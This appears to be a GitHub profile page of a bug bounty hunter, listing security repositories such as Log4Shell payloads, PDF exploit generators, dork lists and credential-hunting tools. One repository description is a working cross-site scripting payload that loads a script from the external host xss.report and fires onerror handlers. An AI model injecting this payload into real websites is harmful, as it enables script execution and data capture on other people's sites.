-
Ethical Hacker | Bug Bounty Hunter
- internet
-
Log4Shell-Payloads Public
Forked from ifconfig-me/Log4Shell-PayloadsLog4Shell / Log4J Payload - CVE-2021-45046 and CVE-2022-42889
1 UpdatedJul 23, 2025 -
gmapsapiscanner Public
Forked from ozguralp/gmapsapiscannerGoogle Aiza API Scanner
-
🛠️ A comprehensive daily routine for bug bounty hunting, featuring methods, tools, and techniques to identify and exploit vulnerabilities effectively.
MIT License UpdatedMay 13, 2025 -
XSS-Finding-Methods Public
🛠️ This file contains methods, tools, and techniques for identifying and exploiting XSS vulnerabilities in web applications.
MIT License UpdatedMay 13, 2025 -
-
virustotalx Public
Forked from orwagodfather/virustotalx♥ gOd fAtHEr oRwA
-
Offensive-Payloads Public
Forked from InfoSecWarrior/Offensive-PayloadsList of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.
PHP UpdatedSep 20, 2024 -
800-Bug-Bounty-Programs Public
Forked from trickest/inventoryAsset inventory of over 800 public bug bounty programs.
Shell MIT License UpdatedAug 3, 2024 -
PDF-Exploits Public
Forked from stish834/pdFExploitsthis repo contains all types of pdf exploits..
UpdatedJun 23, 2024 -
Affinity Public
Forked from ecceman/affinityFree 2D symbols for computer network diagrams
The Unlicense UpdatedJun 13, 2024 -
-
OFFAT Public
Forked from OWASP/OFFATThe OWASP OFFAT tool autonomously assesses your API for prevalent vulnerabilities, though full compatibility with OAS v3 is pending. The project remains a work in progress, continuously evolving to…
Python MIT License UpdatedJun 8, 2024 -
awesome-shodan-queries Public
Forked from jakejarvis/awesome-shodan-queries🔍 A collection of interesting, funny, and depressing search queries to plug into shodan.io 👩💻
-
gitGraber Public
Forked from hisxo/gitGrabergitGraber: monitor GitHub to search and find sensitive data in real time for different online services such as: Google, Amazon, Paypal, Github, Mailgun, Facebook, Twitter, Heroku, Stripe...
Python GNU General Public License v3.0 UpdatedMay 21, 2024 -
-
malicious-pdf Public
Forked from jonaslejon/malicious-pdf💀 Generate a bunch of malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh
-
-
Leaked-Credentials Public
Forked from h4x0r-dz/Leaked-Credentialshow to look for Leaked Credentials !
1 UpdatedMar 28, 2024 -
sourcemapper Public
Forked from denandz/sourcemapperExtract JavaScript source trees from Sourcemap files
Go BSD 3-Clause "New" or "Revised" License UpdatedMar 22, 2024 -
Mindmap Public
Forked from Ignitetechnologies/MindmapThis repository will contain many mindmaps for cyber security technologies, methodologies, courses, and certifications in a tree structure to give brief details about them
UpdatedJan 23, 2024 -
XXElixir Public
Forked from kljunowsky/XXElixirThis tool is designed to test for file upload and XXE vulnerabilities by poisoning XLSX files.
Python UpdatedDec 29, 2023 -
40k-nuclei-templates Public
Forked from linuxadi/40k-nuclei-templates40,000+ Nuclei templates for security scanning and detection across diverse web applications and services
1 UpdatedDec 28, 2023 -
HackerGPT Public
Forked from hendrayoga/hackergptTypeScript GNU General Public License v3.0 UpdatedNov 8, 2023 -
-
'/;//"><script src=https://xss.report/c/lover></script> <img src="data:image/png;base64,iVBORw0KGgo=" onerror="prompt(document.domain)"> <img src="data:image/png;base64,iVBORw0KGgo=" onerror="promp…
UpdatedNov 8, 2023 -
google-dorks-bug-bounty Public
Forked from TakSec/google-dorks-bug-bountyA list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting
MIT License UpdatedOct 28, 2023 -
Awesome-Cybersecurity-Handbooks Public
Forked from 0xsyr0/Awesome-Cybersecurity-HandbooksA huge chunk of my personal notes since I started playing CTFs and working as a Red Teamer.
-
API-s-for-OSINT Public
Forked from cipher387/API-s-for-OSINTList of API's for gathering information about phone numbers, addresses, domains etc
-
scan4all Public
Forked from GhostTroops/scan4allOfficial repository vuls Scan: 15000+PoCs; 23 kinds of application password crack; 7000+Web fingerprints; 146 protocols and 90000+ rules Port scanning; Fuzz, HW, awesome BugBounty( ͡° ͜ʖ ͡°)...
-